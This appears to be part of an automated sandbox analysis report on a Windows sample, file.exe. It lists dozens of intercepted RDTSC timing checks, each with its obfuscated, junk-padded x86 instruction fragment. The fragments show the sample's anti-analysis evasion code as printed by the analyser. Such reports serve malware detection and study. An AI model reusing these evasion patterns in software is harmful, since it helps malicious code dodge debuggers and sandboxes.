                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEC78 second address: 9AEC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F2EE4767536h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEC89 second address: 9AEC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEC8D second address: 9AEC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2EE4767536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEC99 second address: 9AECB7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2EE4744188h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AECB7 second address: 9AECCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE4767541h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9705A2 second address: 9705A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9705A8 second address: 9705AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9705AC second address: 9705B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B207A second address: 9B207E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B221C second address: 9B2241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F2EE4744186h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2241 second address: 9B2258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2EE4767536h 0x0000000a popad 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e js 00007F2EE476753Eh 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B08B6 second address: 9B08BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8058 second address: 9B809E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE476753Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2EE4767545h 0x0000000e jmp 00007F2EE476753Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2EE4767545h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8329 second address: 9B8341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Ah 0x00000007 jnl 00007F2EE4744176h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8341 second address: 9B8345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8345 second address: 9B834F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2EE4744176h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B834F second address: 9B837D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F2EE4767538h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F2EE4767542h 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B837D second address: 9B839E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2EE4744176h 0x0000000a jmp 00007F2EE4744186h 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B839E second address: 9B83A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B83A7 second address: 9B83BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2EE474417Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8571 second address: 9B8575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8575 second address: 9B8593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F2EE474417Ch 0x0000000e popad 0x0000000f pushad 0x00000010 jc 00007F2EE474417Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8FD0 second address: 9B8FDA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2EE4767536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8FDA second address: 9B8FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8FE0 second address: 9B9010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE476753Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edi 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F2EE476753Ah 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9010 second address: 9B9036 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 call 00007F2EE4744179h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2EE4744181h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9036 second address: 9B9057 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE476753Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2EE476753Dh 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9057 second address: 9B905D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B905D second address: 9B9067 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2EE476753Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9067 second address: 9B907B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jbe 00007F2EE474418Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B907B second address: 9B907F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B907F second address: 9B90C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c jmp 00007F2EE474417Fh 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007F2EE4744184h 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B968A second address: 9B96AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2EE4767543h 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F2EE4767536h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B98F2 second address: 9B98F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B98F6 second address: 9B98FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA2F9 second address: 9BA326 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2EE4744176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F2EE474418Bh 0x00000010 jmp 00007F2EE4744185h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA326 second address: 9BA337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE476753Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA337 second address: 9BA33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCE0F second address: 9BCE16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCB37 second address: 9BCB3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCB3D second address: 9BCB50 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2EE4767538h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCB50 second address: 9BCB68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744184h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD917 second address: 9BD91B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD91B second address: 9BD9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F2EE4744182h 0x0000000c jmp 00007F2EE474417Ch 0x00000011 popad 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F2EE4744178h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 add dword ptr [ebp+1247A36Ch], edx 0x00000037 stc 0x00000038 push esi 0x00000039 pushad 0x0000003a jmp 00007F2EE4744187h 0x0000003f mov di, 0334h 0x00000043 popad 0x00000044 pop esi 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push ebp 0x0000004a call 00007F2EE4744178h 0x0000004f pop ebp 0x00000050 mov dword ptr [esp+04h], ebp 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc ebp 0x0000005d push ebp 0x0000005e ret 0x0000005f pop ebp 0x00000060 ret 0x00000061 mov edi, dword ptr [ebp+122D361Ah] 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push ecx 0x0000006b jmp 00007F2EE474417Dh 0x00000070 pop ecx 0x00000071 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE554 second address: 9BE55A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE26F second address: 9BE273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE55A second address: 9BE55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C298D second address: 9C2993 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2993 second address: 9C29DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a adc edi, 45C119ABh 0x00000010 mov dword ptr [ebp+122D2B40h], edi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a mov di, 4C37h 0x0000001e jmp 00007F2EE4767548h 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C29DE second address: 9C29EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 js 00007F2EE4744176h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C29EC second address: 9C29F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0205 second address: 9C020F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2EE4744176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3B81 second address: 9C3B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5972 second address: 9C5978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5978 second address: 9C59C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+124798EDh], edi 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D2C0Fh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F2EE4767538h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov di, BE7Ch 0x00000037 mov di, 0881h 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4BE8 second address: 9C4BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE4744182h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C59C0 second address: 9C59C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4CE2 second address: 9C4CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F2EE4744178h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C693E second address: 9C6942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6942 second address: 9C6954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F2EE4744178h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C69F3 second address: 9C69F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C69F9 second address: 9C69FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C79EF second address: 9C79F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C79F3 second address: 9C7A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7A01 second address: 9C7A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7A07 second address: 9C7A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7A0B second address: 9C7A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7C0E second address: 9C7CCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 jmp 00007F2EE474417Bh 0x0000000e pop ebx 0x0000000f nop 0x00000010 sub dword ptr [ebp+122D1C44h], ebx 0x00000016 mov edi, 008E9BB8h 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov ebx, dword ptr [ebp+122D2B95h] 0x00000028 and ebx, dword ptr [ebp+122D37D6h] 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 call 00007F2EE4744187h 0x0000003a mov dword ptr [ebp+122D1DFAh], ecx 0x00000040 pop edi 0x00000041 mov eax, dword ptr [ebp+122D16F5h] 0x00000047 mov di, cx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edx 0x0000004f call 00007F2EE4744178h 0x00000054 pop edx 0x00000055 mov dword ptr [esp+04h], edx 0x00000059 add dword ptr [esp+04h], 0000001Ah 0x00000061 inc edx 0x00000062 push edx 0x00000063 ret 0x00000064 pop edx 0x00000065 ret 0x00000066 mov bx, ax 0x00000069 nop 0x0000006a pushad 0x0000006b jmp 00007F2EE4744187h 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F2EE4744188h 0x00000077 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9B04 second address: 9C9B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9B09 second address: 9C9B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, 200A32FBh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F2EE4744178h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov ebx, edx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F2EE4744178h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov ebx, 2F1E3B11h 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jl 00007F2EE4744176h 0x00000058 jg 00007F2EE4744176h 0x0000005e popad 0x0000005f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBB26 second address: 9CBB30 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2EE4767536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CED22 second address: 9CED36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744180h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CED36 second address: 9CED3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CED3B second address: 9CED5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2EE4744176h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2EE474417Fh 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CED5B second address: 9CED94 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2EE4767536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2EE4767547h 0x0000000f popad 0x00000010 nop 0x00000011 adc ebx, 061D7600h 0x00000017 push 00000000h 0x00000019 mov ebx, edi 0x0000001b push 00000000h 0x0000001d mov ebx, 3C92009Fh 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CED94 second address: 9CEDA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007F2EE474417Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBDE0 second address: 9CBDFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CACB8 second address: 9CACBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0E8F second address: 9D0E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFF77 second address: 9CFF89 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2EE474417Ah 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1DF6 second address: 9D1DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1DFC second address: 9D1E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
